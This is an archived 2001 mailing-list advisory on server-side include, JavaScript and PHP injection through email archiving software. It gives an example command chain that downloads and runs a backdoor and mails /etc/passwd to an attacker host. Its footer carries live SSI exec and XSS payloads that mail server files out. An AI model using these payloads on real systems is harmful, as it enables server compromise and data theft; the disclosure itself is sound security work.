Hello, Below is something I wrote in regards to threats email archiving software/tools related can bring. # MHonArc # email to html converter while not vulnerable itself # most people use to to convert/display information for archived # lists. (VULNERABLE/TESTED) # Could be exploited via javscript insertion from img tag # and possibly others.(See Georgi Guninski examples) http://www.oac.uci.edu/indiv/ehood/mhonarc.html While this product itself doesn't have a hole in it; it is often used to help to translate mail for other archiving software. I've seen in some examples that email was translated with this tool and archived with other software, and html tags where translated/executed as normal.. Could be exploited via javscript insertion from img tag and possibly others.(See Georgi Guninski examples) I haven't had the time to test alot of other products. Comments, Ideas, blah? Author: Zenomorph adminat_private Email Archives may allow Distributed Attacks against users and Web servers I Introduction Mailing lists are often archived for later viewing on websites. The software that archives these email messages may allow an attacker to execute commands, include false information, cause a wide scale browser DOS, and other possibilities. Millions of sites archive these mailing lists and each site archiving a malicious post could either be attacked or help launch an attack. II Examples: Server Side Includes If an attacker sends a email with a Server Side include(SSI) tag it may be possible to carry out the following attack types listed below. * (Client side) Including of large files, which may lead in a small Denial of Service of clients. (Bandwidth consumption, Memory consumption, etc...) * (Client/Server side) Including of local files such as /dev/urandom. Which will not only slow down the server and eat up bandwidth , but possibly DOS the client viewing the page. * (Server side) Commands to get executed. The server may execute the SSI request if the server is configured correctly. This could lead to possible web server compromise. With the right series of commands an attacker could download and install a backdoor with web server privileges. Below is a example to give you an idea. id;wget http://host/backdoor.c;cc backdoor.c;./a.out <port to listen on>;mail attacker@host </etc/passwd; (Just a random example) Then the attacker would just need to telnet to the port specified within the trojan and he would be greeted by a shell with the user rights of the web server. With a local account an attacker could locally exploit your machine to gain administrative privileges. Possible forging of other users posts: (A More advanced method, which would be on a mail archiving script basis. One would have to learn the output of a post along with it's formatting, and then it may be possible to forge a reply from another user.) Browser Denial of service: Some browsers have holes which can lead to either a browser or system crash. This would occur when an email had been sent with the proper html/JavaScript tags. The email would be archived. With some archiving software the html isn't striped , and it is included on the website page your viewing. Malicious JavaScript/Java applets: May be possible depending on browser security settings. PHP Insertion: May allow command execution or file includes depending on archiving software. Other Markup Languages: Any other markup language which may allow file includes, or command execution. III Solutions : * An example of a solution would be to program these achievers to add a slash whenever a < and > is present to help prevent execution of html/other. (Example: <b>hi</b> becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> ) * Removing the < and > all together , but if program code or math is involved in the post it may remove important information. * The best solution would be to print out the archives in txt format so no code can be executed. Published to the Public October 2001 Copyright October 2001 Cgisecurity.com EOF Lame footer ****************************************************************** <!--#exec cmd="ls -al"--> If you see a listing of files then this vendor is effected. <img src=javascript:alert(document.domain)> If you see a popup window then this vendor is effected. <!--#exec cmd="mail bugtraqat_private < /etc/motd"--> Attempt mailing me motd in case your effected. <!--#exec cmd="mail bugtraqat_private < index.html"--> Attempt mailing me your index.html file for shits and giggles ******************************************************************
This archive was generated by hypermail 2b30 : Thu Oct 25 2001 - 08:48:07 PDT